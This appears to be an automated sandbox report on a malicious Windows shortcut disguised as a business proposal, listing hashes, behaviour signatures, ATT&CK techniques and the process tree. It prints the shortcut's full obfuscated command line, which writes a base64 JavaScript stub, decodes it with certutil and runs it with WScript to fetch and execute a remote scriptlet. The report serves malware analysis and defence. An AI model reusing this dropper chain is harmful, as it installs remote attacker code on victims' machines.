2b54b9c1fd8a6500241780f925fb9105f5c2830ecc8438bdab443d99f45691ee

Analysis

max time kernel
135s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
10/03/2023, 14:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Visualizar_Proposta0364894_901.92526384.415351.96029.lNk.lnk
Size

485B
MD5

ba381a9a66b19a1751b0c57301c3584d
SHA1

008b04a2d9ad8dc22aaa0bb59f36a7c643bfebd7
SHA256

2b54b9c1fd8a6500241780f925fb9105f5c2830ecc8438bdab443d99f45691ee
SHA512

a6ec19515ab49ebf83dc6e48670920763f7e49f36e6f109ba63ac8ef346a5af6e29308ed199718e023f1424bea305bd27003d1bf5159272814ac1810d9e0571e

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
9	4512	WScript.exe
21	4512	WScript.exe
22	4512	WScript.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings	cmd.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4472	conhost.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1980 wrote to memory of 4472	1980	cmd.exe	85
PID 1980 wrote to memory of 4472	1980	cmd.exe	85
PID 4472 wrote to memory of 4620	4472	conhost.exe	86
PID 4472 wrote to memory of 4620	4472	conhost.exe	86
PID 4620 wrote to memory of 1648	4620	cmd.exe	87
PID 4620 wrote to memory of 1648	4620	cmd.exe	87
PID 4620 wrote to memory of 4512	4620	cmd.exe	88
PID 4620 wrote to memory of 4512	4620	cmd.exe	88

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Visualizar_Proposta0364894_901.92526384.415351.96029.lNk.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1980
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "md C:\5lpKCDU\>nul 2>&1 &&s^eT EOYC=C:\5lpKCDU\^5lpKCDU.^jS&&echo dmFyIEM3c2k9InNjIisiciI7RDdzaT0iaXAiKyJ0OmgiO0U3c2k9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDN3NpK0Q3c2krRTdzaSsiLy8zc2FhdzIubGl0aWdhdGVzeTEyLm1vbS8/MS8iKTs=>!EOYC!&&cErtUtil -f -dEco^de !EOYC! !EOYC!&&ca^ll !EOYC!"
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /V/D/c "md C:\5lpKCDU\>nul 2>&1 &&s^eT EOYC=C:\5lpKCDU\^5lpKCDU.^jS&&echo dmFyIEM3c2k9InNjIisiciI7RDdzaT0iaXAiKyJ0OmgiO0U3c2k9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDN3NpK0Q3c2krRTdzaSsiLy8zc2FhdzIubGl0aWdhdGVzeTEyLm1vbS8/MS8iKTs=>!EOYC!&&cErtUtil -f -dEco^de !EOYC! !EOYC!&&ca^ll !EOYC!"
    3⤵
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4620
  - - C:\wINdOws\sYSteM32\certutil.exe
      cErtUtil -f -dEcode C:\5lpKCDU\5lpKCDU.jS C:\5lpKCDU\5lpKCDU.jS
      4⤵
      PID:1648
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\5lpKCDU\5lpKCDU.jS"
      4⤵
      Blocklisted process makes network request
      PID:4512

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\5lpKCDU\5lpKCDU.jS

Filesize
110B

MD5
92520bb7d4f99e0a34357a0bb6596d74

SHA1
35de8370405bca23ec23743a1eec226f4cf774d0

SHA256
2fbdf478b8db2e2ad27cf4367953a8e61d33280be556c410519beeaab42d5cc6

SHA512
794d1fd6a513e778b7b6bcee2ac1385236a0d0c6fca31de74ada8723c12fc222a43e24d2e9a60e56f4904208b6c99e9166d4da823e049c758eea55e6ec58b0cf

Download Submit
C:\5lpKCDU\5lpKCDU.jS

Filesize
110B

MD5
92520bb7d4f99e0a34357a0bb6596d74

SHA1
35de8370405bca23ec23743a1eec226f4cf774d0

SHA256
2fbdf478b8db2e2ad27cf4367953a8e61d33280be556c410519beeaab42d5cc6

SHA512
794d1fd6a513e778b7b6bcee2ac1385236a0d0c6fca31de74ada8723c12fc222a43e24d2e9a60e56f4904208b6c99e9166d4da823e049c758eea55e6ec58b0cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Visualizar_Proposta0364894_901.92526384.415351.96029.lNk.lnk

Filesize
1KB

MD5
ca46d31bb12a4a208bf57ae87361337a

SHA1
1f453e27ad4a381b96a5d26fb25972a5858f40d8

SHA256
e96102be5950579ff122c4ccbd01bdaf0bda9ebc1696e9d5a2e1d2dac0df1e2d

SHA512
dd7833808b4ee2ea1b77863988177e71bed7a449b30c739f898e849ef0c2d3d60e8d3d8d19f76c371f8434b028af60cbb80c29fab9fe7d0bfb745d83485776ee

Download Submit